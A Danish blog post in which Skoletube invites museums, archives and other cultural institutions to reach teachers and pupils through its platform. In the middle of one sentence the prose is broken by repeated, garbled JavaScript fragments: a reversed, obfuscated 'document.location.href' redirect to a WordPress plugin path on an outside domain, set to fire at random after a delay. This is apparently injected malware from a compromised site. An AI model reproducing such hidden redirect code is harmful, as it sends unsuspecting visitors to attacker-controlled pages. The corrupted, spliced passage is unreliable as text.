Få 500.000 besøgende

Skoletube
Kære alle på Formidlingsnet.

Vi vil gerne invitere jer alle til at bruge Skoletube til aktiviteter og formidling i grundskolen af enhver art. Skoletube er en hjemmeside som mere end 550.000 lærere og elever landet over har adgang til, hvor de kan arbejde i en række medieværksteder, målrettet den danske skoleverden. Vores tanke er, at når elever og lærere nu er her, ville det så ikke være utroligt spændende, hvis disse lærere og elever kunne mødes med alle landets museer, arkiver, biblioteker, gallerier, haver, skoletjenester og organisationer?

Invitationen er åben for alle, der har et ønske om at formidle eller bringe vores kulturarv i spil. Det er intet mindre end et potentielt utroligt formidlingsprojekt, der kan favner lokalt eller nationalt, afhængig af jeres mål og ideer.

Herunder er en lille velkomstfilm med en kort introduktion.
film

Peter Leth præsenterer det mulige samarbejde. (cc:by-nc-nd)

Læs alt om tilbuddet om samarbejde

formidling.skoleblogs.dk har vi samlet en række informationer. Her kan man finde en grundigere beskrivelse af invitationens formål og muligheder, man kan se ideer og tanker som kan være muligheder for jer, man kan læse om de konkrete cases der er og kommer her i løbet af året, samt læse om hvordan I kan deltage og dermed eksperimentere og udnytte jeres indhold på 14 af nettets bedste online-tjenester og i samspil med mere en halv million af Danmarks mest ivrige brugere.

Vi glæder os til at åbne dørene for jer – inspirere og samarbejde med jer – og være med til at udvikle en stærk og tæt kobling mellem undervisning og formidling – æstetik, kultur, teater, histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torie, billedkunst, teknologi, cirkus, krig og fred – og alle de andre utrolige områder, som I varetager og som er en del af vores fælles kreative og spændende fortid.

Med venlig hilsen
Peter Leth
På vegne af Lær IT / Skoletube
Kontakt

PS. Dette er selve invitationen. Vi glæder os til at om ganske få uger at vise jer et af de første konkrete projekter, som denne invitation har afstedkommet. (Smugkig her)

Skriv et svar